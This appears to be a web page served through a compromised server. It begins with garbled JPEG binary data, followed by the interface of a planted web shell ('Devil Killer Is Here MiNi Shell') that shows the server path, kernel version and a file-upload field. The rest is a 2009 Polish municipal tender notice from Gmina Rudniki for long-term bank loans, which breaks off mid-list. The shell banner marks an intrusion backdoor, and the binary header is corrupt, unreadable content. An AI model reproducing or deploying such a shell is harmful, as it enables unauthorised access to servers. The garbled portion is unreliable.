JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090225/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090225/42095-N-2009.html

<p class="kh_header"><b>Rudniki: Kredyty długoterminowe na zadania inweatycyjne</b><br>
<b>Numer ogłoszenia: 42095 - 2009; data zamieszczenia: 25.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rudniki , ul. Wojska Polskiego 12, 46-325 Rudniki, woj. opolskie, tel. 034 35-95-072, faks 034 3595013.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rudniki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kredyty długoterminowe na zadania inweatycyjne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę w formie pisemnej na całość zadania ( zadanie 1 i 2 ; z wyliczeniem kosztu oferty dla każdego zadania oddzielnie ) lub tylko na jedno zadnie tj. Nr 1  lub Nr 2.

I część PN 341-PN-2/2009/ 1 zadanie
Kredyty długoterminowe do  wysokości 1 213 000 zł z terminem realizacji spłaty  do 2014 roku przeznaczone będą na wykonanie:
- przebudowy dróg gminnych ( ulic) w Rudnikach,
- przebudowy drogi gminnej Nr 101046 O Żytniów - Żurawie,
- przebudowy drogi Mirowszczyzna - Jaworek Dolny,
- budowy drogi Jaworzno - Julianpol
W zakres 1 zadania wchodzą następujące inwestycje:
1) Przebudowa dróg gminnych ( ulic) w Rudnikach  - planowana kwota
     kredytu 160 000 zł,
2) Przebudowa drogi  gminnej Nr 101046 O Żytniów- Żurawie 
     planowana kwota kredytu 193 000 zł,

3) Przebudowa drogi Mirowszczyzna - Jaworek Dolny - planowana kwota
     kredytu 410 000 zł,
4) Budowa drogi Jaworzno - Julianpol - planowana kwota kredytu 
    450 000 zł
Spłata kredytu następować będzie następująco:
 rok 2009 - kwota kapitału 124 000 zł, 
 rok 2010 - kwota kapitału 262 000 zł,
 rok 2011- kwota kapitału 262 000 zł, 
 rok 2012 - kwota kapitału 262 000 zł,
 rok 2013 - kwota kapitału 217 000 zł, 
 rok 2014 - kwota kapitału  86 000 zł. 
Terminy spłat rat kredytów ustala się na pierwszy dzień miesiąca czerwca i grudnia każdego roku. Harmonogram  spłat rat kredytów jest załącznikiem do SIWZ p.n. Zobowiązania kredytowe Gminy Rudniki wraz z prognozą ich kształtowania się w latach następnych.
Na potrzeby wyliczenia łącznej ceny oferty  należy przyjąć datę uruchomienia kredytu: 1 czerwiec 2009 rok.
Spłata odsetek następować będzie w  okresach miesięcznych do 10 dnia następnego miesiąca za jaki odsetki są  naliczane, począwszy od dnia uruchomienia pierwszej transzy kredytu oraz od wielkości kredytu wykorzystanego. Bank zobowiązany będzie do wyliczenia odsetek i przesłania obciążenia dla zamawiającego  najpóźniej  na 5 dni przed  terminem płatności odsetek. Oprocentowanie kredytu  obliczone będzie według zmiennej stawki referencyjnej WIBOR dla depozytów trzymiesięcznych, (średnia wielkość notowań z poprzedniego miesiąca poprzedzającego spłatę raty kredytu publikowana w internetowym serwisie  Reuters - na stronie internetowej www.money.pl) plus marża banku.
Przy kalkulowaniu odsetek należy przyjąć 365 dni w roku niezależnie czy to będzie rok przestępny czy nie, a ilość dni w miesiącu tyle ile liczy dany miesiąc.
Dla celów wyliczeń oferty należy przyjąć WIBOR 3M - 5,50%
Jednorazowa prowizja bankowa - O%
 Uruchamianie transz kredytu przez bank następować będzie na wniosek Zamawiającego w terminie nie dłuższym niż 3 dni od wystąpienia z wnioskiem.
Zastrzega się możliwość aneksowania umowy w zakresie  wykorzystania części bądź całości kredytu w roku 2009, bez ponoszenia dodatkowych kosztów.
Kredyty będą  udzielane  na  podstawie umowy zaproponowanej przez bank i zaakceptowanej przez Zamawiającego, przy czym umowa musi  obejmować istotne zapisy zawarte w specyfikacji istotnych warunków zamówienia i nie może wykraczać poza jej postanowienia. 
Zabezpieczeniem spłaty kredytu będzie weksel własny in blanco.
 Zastrzega się ujęcie  w umowie możliwości wcześniejszej spłaty kredytu bądź rezygnacji z części kredytu bez ponoszenia dodatkowych kosztów wynikających z tych tytułów.
 W przypadku wcześniejszej spłaty poszczególnych rat bądź całości kredytu, odsetki naliczane będą tylko za okres do terminu spłaty.
 Jedynym kosztem kredytu będzie oprocentowanie, nie przewiduje się prowizji ani żadnych innych kosztów.

Celem wstępnego zbadania zdolności kredytowej Zamawiający do specyfikacji dołącza dokumenty:
- sprawozdanie zbiorcze z wykonania dochodów i wydatków
   budżetowych za 2007r. i  III    kwartały   2008 r.,
- sprawozdanie  o nadwyżce/deficycie  za 2007r. i III kwartały 2008r.,
- sprawozdanie kwartalne o stanie zobowiązań na koniec 2007r.i  na dzień
   30.09.2008r.,
- sprawozdanie kwartalne o stanie należności na koniec 2007r. i na dzień
   30.09. 2008r.
Po sporządzeniu sprawozdawczości rocznej  wyżej wymienione sprawozdania  oraz sprawozdanie z wykonania dochodów podatkowych gminy w terminie późniejszym również zostaną dołączone do specyfikacji.
- plan dochodów i wydatków budżetowych ( w wersji pierwotnej),
- plan przychodów i rozchodów budżetowych ( w wersji pierwotnej),
- plan inwestycji na 2009 rok ( w wersji pierwotnej),
- opinie RIO Opole o projekcie budżetu gminy na 2009 rok,
- opinia o możliwości sfinansowania deficytu budżetowego
    i prawidłowości prognozy kwoty długu,
- uchwałę  w sprawie uchwalenia budżetu gminy na 2009r.
- uchwałę Nr XXIII/185/09 Rady Gminy Rudniki z dnia 3 lutego 2009r.
   w sprawie zmian w Planie inwestycji finansowanych z budżetu
    w 2009 roku,
- uchwałę Nr XXIII/192/09 Rady Gminy Rudniki z dnia 3 lutego 2009r.
   w sprawie zmian w budżecie  gminy na 2009 rok,
- plan dochodów i wydatków budżetowych oraz przychodów i rozchodów
  ( po korekcie dokonanych zmianami w budżecie uchwałą
   z  3 lutego 2009r.),
- uchwały o zaciągnięciu kredytu na poszczególne zadania objęte  
   niniejszą specyfikacją - 4 szt.( objęte powyższym zadaniem),
- zestawienie przepływów pieniężnych ( po ostatniej zmianie 
   z 3 lutego br.),
-  informację o zobowiązaniach kredytowych gminy wg stanu na dzień 
   31.12.2008r. wraz z prognozą ich kształtowania się w latach
    następnych,
- opinię RIO Opole o możliwości spłaty kredytu (zostanie dostarczona
    później po uzyskaniu jej z RIO),
- pismo o wyborze Wójta.

Termin postawienia do dyspozycji środków finansowych:
- w ciągu 30 dni od podpisania umowy kredytowej z możliwością
   wykorzystania do dnia  31 grudnia 2009 roku.
Zamawiający zastrzega sobie prawo rezygnacji z któregokolwiek kredytu, albo zmniejszenia wysokości udzielonego kredytu w sytuacji pozyskania przez Zamawiającego środków finansowania zadania z innych źródeł oraz kiedy nie dojdzie do realizacji któregokolwiek zadania w wyniku nie pozyska środków finansowych zewnętrznych przewidzianych w planie inwestycyjnym.
Zamawiający wówczas nie będzie ponosił żadnych kosztów i opłat z tym związanych.
Zamawiający nie dopuszcza składania ofert wariantowych. 
2 Temat: Kredyty długoterminowe na zadania inwestycyjne 
Wspólny Słownik Zamówień: 66113000-5 
Opis: Przedmiot zamówienia obejmuje udzielenie i obsługę długoterminowych  kredytów bankowych na zadania inwestycyjne planowane do realizacji przez Gminę Rudniki.
Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę w formie pisemnej na całość zadania ( zadanie 1 i 2; z wyliczeniem kosztu oferty dla każdego zadania oddzielnie) lub tylko na jedno zadnie tj. Nr 1  lub Nr 2.

II Część PN 341-PN-2/2009/ 2 zadanie
Kredyty długoterminowe do  wysokości  510 000 zł z terminem realizacji spłaty  do 2014 roku przeznaczone będą na wykonanie :
- przebudowy domu kultury na Centrum Spotkań Muzyków Jazzowych w
   Rudnikach,
- budowę boiska o sztucznej nawierzchni w Dalachowie.
W zakres 2 zadania wchodzą następujące inwestycje:
1)   Przebudowa domu kultury na Centrum Spotkań Muzyków Jazzowych
      w Rudnikach - planowana kwota kredytu 210 000 zł,
2)  Budowa boiska o sztucznej nawierzchni w Dalachowie - planowana
      kwota kredytu 300 000 zł,
Spłata kredytu następować będzie następująco:
 rok 2009 - kwota kapitału 57 000 zł, 
 rok 2010 - kwota kapitału 112 000 zł,
 rok 2011- kwota kapitału 112 000 zł, 
 rok 2012 - kwota kapitału 112 00 zł,
 rok 2013 - kwota kapitału  87 000 zł, 
 rok 2014 - kwota kapitału  30 000 zł. 
Terminy spłat rat kredytów ustala się na  pierwszy dzień miesiąca czerwca i grudnia  każdego roku. Harmonogram spłat rat kredytów jest załącznikiem do SIWZ p.n. Zobowiązania  kredytowe Gminy Rudniki wraz z prognozą ich kształtowania się w latach następnych.
Na potrzeby wyliczenia łącznej ceny oferty należy przyjąć datę uruchomienia kredytu: 1 czerwiec 2009 rok 
Spłata odsetek następować będzie w  okresach miesięcznych do 10 dnia następnego miesiąca za jaki odsetki są  naliczane, począwszy od dnia uruchomienia pierwszej transzy kredytu oraz od wielkości kredytu wykorzystanego. Bank zobowiązany będzie do wyliczenia odsetek i przesłania obciążenia dla zamawiającego  najpóźniej  na 5 dni przed  terminem płatności odsetek. Oprocentowanie kredytu  obliczone będzie  według zmiennej stawki referencyjnej WIBOR dla depozytów trzymiesięcznych, (średnia wielkość notowań z poprzedniego miesiąca poprzedzającego spłatę raty kredytu publikowana w internetowym Reuters - na stronie internetowej www.money.pl) plus marża banku.
Przy kalkulowaniu odsetek należy przyjąć 365 dni w roku niezależnie czy to będzie rok przestępny czy nie, a ilość dni w miesiącu tyle ile liczy dany miesiąc.
Dla celów wyliczeń oferty należy przyjąć  WIBOR 3M - 5,50%
 Jednorazowa prowizja bankowa - O%
 Uruchamianie transz kredytu przez bank następować będzie na wniosek zamawiającego w terminie nie dłuższym 3 dni od wystąpienia z wnioskiem.
Zastrzega się możliwość aneksowania umowy w zakresie  wykorzystania części bądź całości kredytu w roku 2009, bez ponoszenia dodatkowych kosztów.
Kredyty będą  udzielane  na  podstawie umowy zaproponowanej przez bank i zaakceptowanej przez zamawiającego, przy czym umowa musi obejmować istotne zapisy zawarte w specyfikacji istotnych warunków zamówienia  i nie może
Zastrzega się ujęcie  w umowie możliwości wcześniejszej spłaty kredytu bądź rezygnacji z części kredytu bez ponoszenia dodatkowych kosztów wynikających z tych tytułów. 
W przypadku wcześniejszej spłaty poszczególnych rat bądź całości kredytu, odsetki naliczane będą tylko za okres do terminu spłaty. Jedynym kosztem kredytu będzie oprocentowanie, nie przewiduje się prowizji ani żadnych innych kosztów. 

Celem wstępnego zbadania zdolności kredytowej zamawiający do specyfikacji dołącza dokumenty:
- sprawozdanie zbiorcze z wykonania dochodów i wydatków
   budżetowych za 2007r. i III  kwartały   2008 r.,
- sprawozdanie  o nadwyżce/deficycie  za 2007r. i III kwartały 2008r.,
- sprawozdanie kwartalne o stanie zobowiązań  na koniec 2007r.
   i na dzień 30.09.2008r.,
-  sprawozdanie kwartalne o stanie należności na koniec 2007r.
    i na dzień 30.09. 2008r.
Po sporządzeniu sprawozdawczości rocznej za 2008r wyżej wymienione sprawozdania  oraz sprawozdanie z wykonania dochodów podatkowych gminy w terminie późniejszym również zostaną dołączone do specyfikacji 
- plan dochodów i wydatków budżetowych ( w wersji pierwotnej),
- plan przychodów i rozchodów budżetowych ( w wersji pierwotnej),
- plan inwestycji na 2009 rok ( w wersji pierwotnej),
- opinie RIO Opole o projekcie budżetu gminy na 2009 rok,
- opinia o możliwości sfinansowania deficytu budżetowego
    i prawidłowości prognozy kwoty długu,
- uchwałę  w sprawie uchwalenia budżetu gminy na 2009r.
- uchwałę Nr XXIII/185/09 Rady Gminy Rudniki z dnia 3 lutego 2009r.
   w sprawie zmian w Planie inwestycji finansowanych z budżetu
    w 2009 roku,
- uchwałę Nr XXIII/192/09 Rady Gminy Rudniki z dnia 3 lutego 2009r.
  w sprawie zmian w budżecie  gminy na 2009 rok,
- plan dochodów i wydatków budżetowych oraz przychodów i rozchodów
  ( po korekcie dokonanych zmianami w budżecie uchwałą 
    z 3 lutego 2009r.),
- uchwały o zaciągnięciu kredytu na poszczególne zadania objęte  
   niniejszą specyfikacją - 2 szt.(objęte powyższym zadaniem),
- zestawienie przepływów pieniężnych ( po ostatniej zmianie
   z 3 lutego br.),
- informację o zobowiązaniach kredytowych gminy wg stanu na dzień 
   31.12.2008r. wraz z prognozą ich kształtowania się w latach
    następnych,
- opinię RIO Opole o możliwości spłaty kredytu ( zostanie dostarczona
   później po uzyskaniu jej z RIO),
- pismo o wyborze Wójta.

Termin postawienia do dyspozycji środków finansowych:
- w ciągu 30 dni od podpisania umowy kredytowej z możliwością
   wykorzystania do dnia  31 grudnia 2009 roku.
Zamawiający zastrzega sobie prawo rezygnacji z któregokolwiek kredytu, albo zmniejszenia wysokości udzielonego kredytu w sytuacji pozyskania przez Zamawiającego środków finansowania zadania z innych źródeł oraz kiedy nie dojdzie do realizacji któregokolwiek zadania w wyniku nie pozyska środków finansowych zewnętrznych przewidzianych w planie inwestycyjnym.
Zamawiający wówczas nie będzie ponosił żadnych kosztów i opłat z tym związanych.
Zamawiający nie dopuszcza składania ofert wariantowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Wykonawca posiada uprawnienie do wykonywania określonej działalności tj. są osobami prawnymi utworzonymi zgodnie z przepisami ustaw, działającymi na podstawie zezwoleń uprawniających do wykonywania czynności bankowych obciążających ryzykiem środki powierzone pod jakimkolwiek tytułem zwrotnym, wypełniającymi tym samym warunki definicji Banku zawartej w art. 2 ustawy z dnia 29 sierpnia 1997r. Prawo bankowe ( dz. U. z 2002r. Nr 72, poz. 665 z późn. zm.),
2. Posiadają niezbędną wiedzę i doświadczenie  oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawią pisemne zobowiązanie  innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ustawy prawo zamówień publicznych oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych
Ocena dokonywana będzie metodą  spełnia/ nie spełnia na podstawie złożonych dokumentów i oświadczeń..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie w/w warunków Wykonawca złoży wraz z ofertą: 
Bank państwowy utworzony na podstawie ustawy Prawo bankowe- rozporządzenie Ministra Skarbu Państwa w sprawie nadania statutu Banku, aktualny skład zarządu wraz z dokumentami powołującymi poszczególnych członków ; bank powołany na podstawie kodeksu spółek handlowych i ustawy Prawo bankowe - aktualny odpis z Krajowego Rejestru Sadowego wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składania ofert, załączy także  zezwolenie na podjęcie  działalności gospodarczej w zakresie objętym zamówieniem publicznym, oświadczenie z art. 22 i 24 ustawy Pzp. oraz aktualne zaświadczenie  właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS lub KRUS potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub  rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.rudniki.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Rudnikach
46-325 Rudniki
ul. Wojska Polskiego12
( pokój Nr 2 parter).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2009 godzina 09:00, miejsce: Urząd Gminy w Rudnikach
46-325 Rudniki
ul. Wojska Polskiego12.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Data  zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych: 25.02.2009r..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kredyty długoterminowe na zadania inwestycyjne
I część PN 341-PN-2/2009/1 zadanie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kredyty długoterminowe do  wysokości 1 213 000 zł z terminem realizacji spłaty  do 2014 roku przeznaczone będą na wykonanie:
- przebudowy dróg gminnych ( ulic) w Rudnikach,
- przebudowy drogi gminnej Nr 101046 O Żytniów - Żurawie,
- przebudowy drogi Mirowszczyzna - Jaworek Dolny,
- budowy drogi Jaworzno - Julianpol
W zakres 1 zadania wchodzą następujące inwestycje:
1) Przebudowa dróg gminnych ( ulic) w Rudnikach  - planowana kwota
     kredytu 160 000 zł,
2) Przebudowa drogi  gminnej Nr 101046 O Żytniów- Żurawie 
     planowana kwota kredytu 193 000 zł,

3) Przebudowa drogi Mirowszczyzna - Jaworek Dolny - planowana kwota
     kredytu 410 000 zł,
4) Budowa drogi Jaworzno - Julianpol - planowana kwota kredytu 
    450 000 zł
Spłata kredytu następować będzie następująco:
 rok 2009 - kwota kapitału 124 000 zł, 
 rok 2010 - kwota kapitału 262 000 zł,
 rok 2011- kwota kapitału 262 000 zł, 
 rok 2012 - kwota kapitału 262 000 zł,
 rok 2013 - kwota kapitału 217 000 zł, 
 rok 2014 - kwota kapitału  86 000 zł. 
Terminy spłat rat kredytów ustala się na pierwszy dzień miesiąca czerwca i grudnia każdego roku. Harmonogram  spłat rat kredytów jest załącznikiem do SIWZ p.n. Zobowiązania kredytowe Gminy Rudniki wraz z prognozą ich kształtowania się w latach następnych.
Na potrzeby wyliczenia łącznej ceny oferty  należy przyjąć datę uruchomienia kredytu: 1 czerwiec 2009 rok.
Spłata odsetek następować będzie w  okresach miesięcznych do 10 dnia następnego miesiąca za jaki odsetki są  naliczane, począwszy od dnia uruchomienia pierwszej transzy kredytu oraz od wielkości kredytu wykorzystanego. Bank zobowiązany będzie do wyliczenia odsetek i przesłania obciążenia dla zamawiającego  najpóźniej  na 5 dni przed  terminem płatności odsetek. Oprocentowanie kredytu  obliczone będzie według zmiennej stawki referencyjnej WIBOR dla depozytów trzymiesięcznych, (średnia wielkość notowań z poprzedniego miesiąca poprzedzającego spłatę raty kredytu publikowana w internetowym serwisie  Reuters - na stronie internetowej www.money.pl) plus marża banku.
Przy kalkulowaniu odsetek należy przyjąć 365 dni w roku niezależnie czy to będzie rok przestępny czy nie, a ilość dni w miesiącu tyle ile liczy dany miesiąc.
Dla celów wyliczeń oferty należy przyjąć WIBOR 3M - 5,50%
Jednorazowa prowizja bankowa - O%
 Uruchamianie transz kredytu przez bank następować będzie na wniosek Zamawiającego w terminie nie dłuższym niż 3 dni od wystąpienia z wnioskiem.
Zastrzega się możliwość aneksowania umowy w zakresie  wykorzystania części bądź całości kredytu w roku 2009, bez ponoszenia dodatkowych kosztów.
Kredyty będą  udzielane  na  podstawie umowy zaproponowanej przez bank i zaakceptowanej przez Zamawiającego, przy czym umowa musi  obejmować istotne zapisy zawarte w specyfikacji istotnych warunków zamówienia i nie może wykraczać poza jej postanowienia. 
Zabezpieczeniem spłaty kredytu będzie weksel własny in blanco.
 Zastrzega się ujęcie  w umowie możliwości wcześniejszej spłaty kredytu bądź rezygnacji z części kredytu bez ponoszenia dodatkowych kosztów wynikających z tych tytułów.
 W przypadku wcześniejszej spłaty poszczególnych rat bądź całości kredytu, odsetki naliczane będą tylko za okres do terminu spłaty.
 Jedynym kosztem kredytu będzie oprocentowanie, nie przewiduje się prowizji ani żadnych innych kosztów.

Celem wstępnego zbadania zdolności kredytowej Zamawiający do specyfikacji dołącza dokumenty:
- sprawozdanie zbiorcze z wykonania dochodów i wydatków
   budżetowych za 2007r. i  III    kwartały   2008 r.,
- sprawozdanie  o nadwyżce/deficycie  za 2007r. i III kwartały 2008r.,
- sprawozdanie kwartalne o stanie zobowiązań na koniec 2007r.i  na dzień
   30.09.2008r.,
- sprawozdanie kwartalne o stanie należności na koniec 2007r. i na dzień
   30.09. 2008r.
Po sporządzeniu sprawozdawczości rocznej  wyżej wymienione sprawozdania  oraz sprawozdanie z wykonania dochodów podatkowych gminy w terminie późniejszym również zostaną dołączone do specyfikacji.
- plan dochodów i wydatków budżetowych ( w wersji pierwotnej),
- plan przychodów i rozchodów budżetowych ( w wersji pierwotnej),
- plan inwestycji na 2009 rok ( w wersji pierwotnej),
- opinie RIO Opole o projekcie budżetu gminy na 2009 rok,
- opinia o możliwości sfinansowania deficytu budżetowego
    i prawidłowości prognozy kwoty długu,
- uchwałę  w sprawie uchwalenia budżetu gminy na 2009r.
- uchwałę Nr XXIII/185/09 Rady Gminy Rudniki z dnia 3 lutego 2009r.
   w sprawie zmian w Planie inwestycji finansowanych z budżetu
    w 2009 roku,
- uchwałę Nr XXIII/192/09 Rady Gminy Rudniki z dnia 3 lutego 2009r.
   w sprawie zmian w budżecie  gminy na 2009 rok,
- plan dochodów i wydatków budżetowych oraz przychodów i rozchodów
  ( po korekcie dokonanych zmianami w budżecie uchwałą
   z  3 lutego 2009r.),
- uchwały o zaciągnięciu kredytu na poszczególne zadania objęte  
   niniejszą specyfikacją - 4 szt.( objęte powyższym zadaniem),
- zestawienie przepływów pieniężnych ( po ostatniej zmianie 
   z 3 lutego br.),
-  informację o zobowiązaniach kredytowych gminy wg stanu na dzień 
